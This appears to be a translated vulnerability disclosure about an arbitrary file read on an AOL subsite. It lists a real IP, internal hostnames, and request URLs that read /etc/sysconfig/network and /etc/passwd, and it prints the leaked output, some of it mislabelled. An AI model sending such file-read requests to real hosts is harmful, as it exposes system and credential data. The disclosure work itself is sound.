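2015-02-03: Details reported to the vendor; awaiting vendor response
2015-02-05: Vendor confirmed; details disclosed to the vendor only
2015-02-15: Details disclosed to core white hats and experts in related fields
2015-02-25: Details disclosed to regular white hats
2015-03-07: Details disclosed to intern white hats
2015-03-20: Details disclosed to the public
Arbitrary system file read vulnerability on an AOL subsite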
https://www.shodan.io/host/149.174.97.92
149.174.97.92
http://huffsmith-shared-a-atc.evip.aol.com/
last
http://149.174.97.92/etc/sysconfig/network
NETWORKING=yes
NETWORKING_IPV6=no
HOSTNAME=amp-prod-blogside-a108.ihost.aol.com
GATEWAY=205.188.29.254
http://149.174.97.92/etc/passwd
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
149.174.108.111 amp-prod-blogside-a114.ihost.aol.com amp-prod-blogside-a114.ihost.aol amp-prod-blogside-a114.ihost amp-prod-blogside-a114
Reconfigure
Severity: Medium
Vulnerability Rank: 6
Confirmation time: 2015-02-05 02:42
2015-02-05: Please remove this link and do NOT publish this vulnerability until we have had a chance to correct the issue.